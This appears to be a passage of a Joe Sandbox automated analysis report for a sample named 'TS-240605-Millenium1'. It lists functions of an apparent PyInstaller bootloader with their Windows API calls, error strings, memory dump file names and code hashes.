Failed to get UTF-8 buffer size., xrefs: 00007FF6CEB28ADF
Out of memory., xrefs: 00007FF6CEB28ACF

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 68ef013f5c257526e5a4a2decc1cb5deb5404ee9189374e1049a365f6b0b0852
Instruction ID: 108b40fad511047e52cd5c2c5845004324125079a30e8a385e425615fc6a8684
Opcode Fuzzy Hash: 68ef013f5c257526e5a4a2decc1cb5deb5404ee9189374e1049a365f6b0b0852
Instruction Fuzzy Hash: 5541A132608B8282E620DF15BA4417AB6B1FFA6B91F548535FACDA7B95DF3CE441C700

Function 00007FF6CEB28EF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB28F31

Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0

WideCharToMultiByte.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB28FA5

Strings

WideCharToMultiByte, xrefs: 00007FF6CEB28F45, 00007FF6CEB28FB6
win32_utils_to_utf8, xrefs: 00007FF6CEB28F72
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6CEB28FAF
Failed to get UTF-8 buffer size., xrefs: 00007FF6CEB28F3E
Out of memory., xrefs: 00007FF6CEB28F6B

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
Instruction ID: 65384fbbcef2ec1e32a076b0817e22cd34c62da3fe9bc81ebba4b7ca48a8c276
Opcode Fuzzy Hash: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
Instruction Fuzzy Hash: 2D216D21B09B4295EB10DF15EA44079B372EFA5B82F544A36FA8DE7794EF3CE5018304

Function 00007FF6CEB277B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6CEB27926

Part of subcall function 00007FF6CEB30A40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB30A54

Part of subcall function 00007FF6CEB30A14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB30A28

Strings

PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6CEB27842
WARNING: file already exists but should not: %s, xrefs: 00007FF6CEB278A8
\, xrefs: 00007FF6CEB277FC
ERROR: file already exists but should not: %s, xrefs: 00007FF6CEB2788C
%s%c%s, xrefs: 00007FF6CEB277F5

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: 12de4fbda132ce6cb05f4d8d3af4badfde23b35f2f99a9828bec22b31e5f261e
Instruction ID: 0c866e042ab735a57664bae824cbc66f36332de55f6bbbb53f069ebae5eac242
Opcode Fuzzy Hash: 12de4fbda132ce6cb05f4d8d3af4badfde23b35f2f99a9828bec22b31e5f261e
Instruction Fuzzy Hash: FA51A021A0D75351FA11AF26AB196B962B19FB7BC2F480131F9CDEB7D6DE2CE4008704

Function 00007FF6CEB27630 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6CEB27BB1,00000000,?,00000000,00000000,?,00007FF6CEB2153F), ref: 00007FF6CEB2768F

Part of subcall function 00007FF6CEB22B10: MessageBoxW.USER32 ref: 00007FF6CEB22BE5

Strings

LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6CEB27666
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6CEB276A3
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6CEB276EA

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: c86ba785b39e1744ff17e8f21851e01a02fd234bd2ff69c05b5589a30fcca8ce
Instruction ID: f9749c67d5c5bd4ae0701217b88e6ea3820a9a33d0071b862bbc05b63a81a9e4
Opcode Fuzzy Hash: c86ba785b39e1744ff17e8f21851e01a02fd234bd2ff69c05b5589a30fcca8ce
Instruction Fuzzy Hash: AC319511B1C74241FA619F25D75A3BA52B1AFBA7C2F440432FACEE36D6EE2CE1048604

Function 00007FF6CEB2E3C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E44D
GetLastError.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E45B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E485
FreeLibrary.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E4F3
GetProcAddress.KERNEL32(?,?,?,00007FF6CEB2E67A,?,?,?,00007FF6CEB2D5AC,?,?,?,00007FF6CEB2D1A1), ref: 00007FF6CEB2E4FF

Strings

api-ms-, xrefs: 00007FF6CEB2E46D

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
Instruction ID: 94feb048879a9299bcd498304c92457248b652d5f59f2dc0c414d23cf29e3253
Opcode Fuzzy Hash: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
Instruction Fuzzy Hash: B531B222F1A64291FE12DF0796045B923B4BF76BA1F190535FDADAB7A4DE3CE4808700

Function 00007FF6CEB28DE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28EA0

Strings

win32_utils_from_utf8, xrefs: 00007FF6CEB28E69
Failed to decode wchar_t from UTF-8, xrefs: 00007FF6CEB28EAA
Out of memory., xrefs: 00007FF6CEB28E62
MultiByteToWideChar, xrefs: 00007FF6CEB28E2E, 00007FF6CEB28EB1
Failed to get wchar_t buffer size., xrefs: 00007FF6CEB28E27

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
Instruction ID: 5a05ba6fe037c98f5de85ef44a66e0c5d61dbc84791183a69b0add5eb5e23f55
Opcode Fuzzy Hash: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
Instruction Fuzzy Hash: EB214422B08A4281EB50DF29F540079A371FFA97C5F584532EB8CE7B69EE3CD5418700

Function 00007FF6CEB3BF00 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6CEB3BF0F
FlsGetValue.KERNEL32 ref: 00007FF6CEB3BF24
FlsSetValue.KERNEL32 ref: 00007FF6CEB3BF45
FlsSetValue.KERNEL32 ref: 00007FF6CEB3BF72
FlsSetValue.KERNEL32 ref: 00007FF6CEB3BF83
FlsSetValue.KERNEL32 ref: 00007FF6CEB3BF94
SetLastError.KERNEL32 ref: 00007FF6CEB3BFAF

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
Instruction ID: 104a83e5767e291dd1ec8dbcda8a94449b96129f12100fd5cb75ac4c206c2252
Opcode Fuzzy Hash: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
Instruction Fuzzy Hash: 90217F24A0D20243FA686F21979717962724F667B2F141734F8FEE76CADE2CB8004B00

Function 00007FF6CEB48D9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6CEB48DCD
GetLastError.KERNEL32 ref: 00007FF6CEB48DD9
CloseHandle.KERNEL32 ref: 00007FF6CEB48DF1
CreateFileW.KERNEL32 ref: 00007FF6CEB48E1C
WriteConsoleW.KERNEL32 ref: 00007FF6CEB48E3B

Strings

CONOUT$, xrefs: 00007FF6CEB48DFD

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
Instruction ID: 32b9f626b619e4aff2bbce649f8f3dd74ce58e290f8dc0c724b1289867a52ed1
Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
Instruction Fuzzy Hash: CB118122A18A4186F3508F46E944339B6B0FBA9FE5F000235FA9DD7794DF3CE5448B40

Function 00007FF6CEB3C078 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C087
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C0BD
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C0EA
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C0FB
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C10C
SetLastError.KERNEL32(?,?,?,00007FF6CEB35CBD,?,?,?,?,00007FF6CEB3F9AF,?,?,00000000,00007FF6CEB3C196,?,?,?), ref: 00007FF6CEB3C127

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
Instruction ID: 27aea83272919a7ff10a2fa152fc60f93dbd572c9a675ff45c14de8751a3776a
Opcode Fuzzy Hash: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
Instruction Fuzzy Hash: 2A11AE20A4C68343FA54AF61A78307962728F667B2F140735F8AEF76C6DE2CB4414700

Function 00007FF6CEB225E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF6CEB227CF), ref: 00007FF6CEB22618
DialogBoxIndirectParamW.USER32 ref: 00007FF6CEB226DC
DeleteObject.GDI32 ref: 00007FF6CEB2270F
DestroyIcon.USER32 ref: 00007FF6CEB22721

Strings

Unhandled exception in script, xrefs: 00007FF6CEB22648

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
Instruction ID: f5af6dee7187d0fa2c2a4dded5393a7d4e44a3ac74615bac16369137cfd845c5
Opcode Fuzzy Hash: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
Instruction Fuzzy Hash: CB314E32A09A8285EB20DF21EA551FA6374FF9AB85F440136FA8D9BB59DF3CD505C700

Function 00007FF6CEB229C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4

Part of subcall function 00007FF6CEB28770: GetLastError.KERNEL32(00000000,00007FF6CEB22A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28797
Part of subcall function 00007FF6CEB28770: FormatMessageW.KERNEL32 ref: 00007FF6CEB287C6

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

MessageBoxW.USER32 ref: 00007FF6CEB22AD0
MessageBoxA.USER32 ref: 00007FF6CEB22AEC

Strings

Fatal error detected, xrefs: 00007FF6CEB22AA6, 00007FF6CEB22ADE
%s%s: %s, xrefs: 00007FF6CEB22A4B

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
Instruction ID: 89329c1c8542c3eeb3f35c8974cf028e56dc5d9db2c49d930e02d5ed46fc405b
Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
Instruction Fuzzy Hash: 31314172628A8281E630DF10E5556FA6374FFA5BC5F804036FACDA6A59DF3CD605CB40

Function 00007FF6CEB3A83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6CEB3A861
GetProcAddress.KERNEL32 ref: 00007FF6CEB3A877
FreeLibrary.KERNEL32 ref: 00007FF6CEB3A89E

Strings

CorExitProcess, xrefs: 00007FF6CEB3A870
mscoree.dll, xrefs: 00007FF6CEB3A858

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
Instruction ID: c6bd174c17174d6468024502a825bc5aee3a92a76e87c523196185f487fc086b
Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
Instruction Fuzzy Hash: 37F0C862B0960681FB118F14E5453352330AF6AB52F54063AE6AE966F4CF2CE049C700

Function 00007FF6CEB4A420 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6CEB4A448
_set_statfp.LIBCMT ref: 00007FF6CEB4A463
_set_statfp.LIBCMT ref: 00007FF6CEB4A47F
_set_statfp.LIBCMT ref: 00007FF6CEB4A4BB

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: f61b9117f49d744cccaa70204b5ee2eff4a1db5fff6392c1fe1c811bc3b09680
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: 5A117722E1CA0B01FA5419A9E74A37D21616FB7372F140637F5EEB66F7EE2C68404104

Function 00007FF6CEB3C140 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C15F
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C17E
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C1A6
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C1B7
FlsSetValue.KERNEL32(?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3C1C8

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

